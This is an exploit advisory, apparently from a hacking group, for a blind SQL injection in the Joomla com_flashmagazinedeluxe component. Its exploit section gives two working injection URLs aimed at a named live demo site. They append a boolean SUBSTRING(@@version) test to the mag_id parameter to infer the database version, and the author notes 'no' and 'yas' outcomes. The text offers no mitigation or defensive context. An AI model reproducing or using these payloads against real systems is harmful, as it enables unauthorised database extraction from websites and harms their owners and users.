============================================================================== [»] Joomla com_flashmagazinedeluxe Remote Blind Injection Vulnerability ============================================================================== [»] Script: [Joomla] [»] Language: [ PHP ] [»] Founder: [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ] [»] Greetz to:[ sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ] ########################################################################### ===[ Exploit ]=== [»] http://demo.joomplace.com/index.php?option=com_flashmagazinedeluxe&Itemid=36&task=magazine&mag_id=4+AND SUBSTRING(@@version,1,1)=4 (no) [»] http://demo.joomplace.com/index.php?option=com_flashmagazinedeluxe&Itemid=36&task=magazine&mag_id=4+AND SUBSTRING(@@version,1,1)=5 (yas) ###########################################################################